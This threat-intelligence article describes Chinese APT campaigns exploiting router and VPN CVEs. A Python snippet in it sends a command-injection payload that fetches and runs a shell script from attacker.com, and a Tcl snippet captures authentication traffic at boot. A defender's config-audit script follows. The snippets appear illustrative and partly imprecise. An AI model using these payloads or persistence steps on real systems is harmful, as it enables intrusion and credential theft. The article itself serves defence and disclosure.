Over the past several years, a concerted campaign by Chinese state-sponsored Advanced Persistent Threat (APT) groups has exploited critical vulnerabilities in enterprise-grade routers to establish long-term footholds within global telecommunications and government networks.
These actors, often identified under monikers such as Salt Typhoon and OPERATOR PANDA, have systematically targeted provider edge (PE) and customer edge (CE) devices from leading vendors, leveraging publicly disclosed Common Vulnerabilities and Exposures (CVEs) to gain initial unauthorized access.
Their operations have demonstrated a high degree of stealth, chaining multiple exploits to move laterally and evade conventional detection tools.
The typical multi-stage attack flow begins with a web-component injection and culminates in embedded packet capture on the compromised device.
In initial intrusion attempts, threat actors commonly exploit CVE-2024-21887 in Ivanti Connect Secure and CVE-2024-3400 within Palo Alto Networks PAN-OS GlobalProtect.
These flaws allow remote code execution through crafted HTTP requests, granting attackers a foothold in the router’s privileged management interface.
Researchers noted that once access is achieved, the actors pivot swiftly, exploiting older vulnerabilities such as CVE-2018-0171 in Cisco IOS Smart Install and CVE-2023-20198 in the IOS XE web management interface, creating a dependable chain of escalation and persistence.
Cyble analysts identified rapid weaponization of publicly available proof-of-concept exploit code, often tailored in Python or Tcl scripts to suit specific router environments.
A representative snippet used in these campaigns is shown here, demonstrating command injection via the web management interface:
import requests
url = "https[:]//192.0.2.1/+CSCOE+/translation-table?type=misc&text_scale=1"
payload = {"command"[:] "system ('curl http[:]//attacker.com/shell[.]sh | sh')"}
response = requests[.]post (url, data=payload, verify=False)
print (response[.]status_code, response[.]text)
Leveraging this technique, attackers achieve remote shell execution, subsequently deploying custom tooling to harvest configuration files, credentials, and session data.
Persistence Tactics
After initial access, Chinese APT groups focus on embedding themselves deeply within the router’s operating environment to ensure longevity.
They alter Access Control Lists (ACLs) to whitelist attacker-controlled IP addresses and open non-standard ports such as 32768 and 8081 for covert access.
In many cases, malefactors exploit Cisco’s Embedded Packet Capture (EPC) functionality to siphon TACACS+ and RADIUS authentication traffic, effectively harvesting clear-text credentials. To automate this, they deploy Tcl-based scripts stored in the router’s flash memory:
package require json
set capCmd [list "ip" "packet" "capture" "point-to-point" "rtl" "1000"]
exec {*}$capCmd > flash:auth_capture[.]pcap
These scripts run at boot time, triggered via altered startup configurations, creating persistent PCAP files that are periodically exfiltrated over encrypted GRE tunnels.
By manipulating the AAA (Authentication, Authorization, Accounting) configuration, the actors redirect logs and disable alerting features, effectively blinding enterprise defenders.
Through these methods, the compromised devices become reliable launchpads for broader enterprise infiltration, allowing the APT actors to maintain a stealthy presence for months or even years.
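As an added, defender-side example that is not part of the original article or of Cyble's tooling: a small Python audit that scans a constructed Cisco IOS-style running-config for the persistence indicators described above (ACL entries for ports 32768 and 8081, embedded packet capture, Tcl scripts launched from flash, GRE tunnels, disabled syslog traps). The sample config and the check patterns are illustrative assumptions, not signatures taken from the report.

```python
import re

# Constructed sample of a Cisco IOS-style running-config carrying the
# persistence indicators the article describes (not a real capture).
SAMPLE_CONFIG = """\
hostname edge-rtr-01
aaa new-model
no logging trap
interface Tunnel100
 tunnel mode gre ip
 tunnel destination 203.0.113.77
ip access-list extended MGMT-IN
 permit tcp host 203.0.113.77 any eq 32768
 permit tcp host 203.0.113.77 any eq 8081
 permit tcp 10.0.0.0 0.255.255.255 any eq 22
monitor capture AUTH_CAP interface GigabitEthernet0/0 both
monitor capture AUTH_CAP match ipv4 any any
event manager applet BOOT_HOOK
 event syslog pattern "SYS-5-RESTART"
 action 1.0 cli command "tclsh flash:auth_capture.tcl"
"""

# Indicator checks keyed to the behaviours described above; each name is
# reported when its pattern appears anywhere in the config text.
CHECKS = [
    ("covert-port ACL entry",
     re.compile(r"^\s*permit\s+\S+.*\beq\s+(32768|8081)\b", re.M)),
    ("embedded packet capture configured",
     re.compile(r"^\s*monitor capture\s+\S+", re.M)),
    ("Tcl script invoked from flash",
     re.compile(r"tclsh\s+flash:\S+", re.M)),
    ("GRE tunnel interface present",
     re.compile(r"^\s*tunnel mode gre", re.M)),
    ("syslog trap logging disabled",
     re.compile(r"^\s*no logging trap", re.M)),
]

def audit_config(config: str) -> list[str]:
    """Return the names of indicator checks that fire on the config."""
    return [name for name, pat in CHECKS if pat.search(config)]

def permitted_sources(config: str) -> set[str]:
    """Host addresses whitelisted by 'permit ... host X' ACL lines."""
    return set(re.findall(r"^\s*permit\s+\S+\s+host\s+(\S+)", config, re.M))

if __name__ == "__main__":
    for hit in audit_config(SAMPLE_CONFIG):
        print("indicator:", hit)
    print("ACL-permitted hosts:", sorted(permitted_sources(SAMPLE_CONFIG)))
```

The permitted-host list is meant to be compared against the organisation's known management ranges; any address outside them is a candidate for the attacker-controlled whitelisting the article describes.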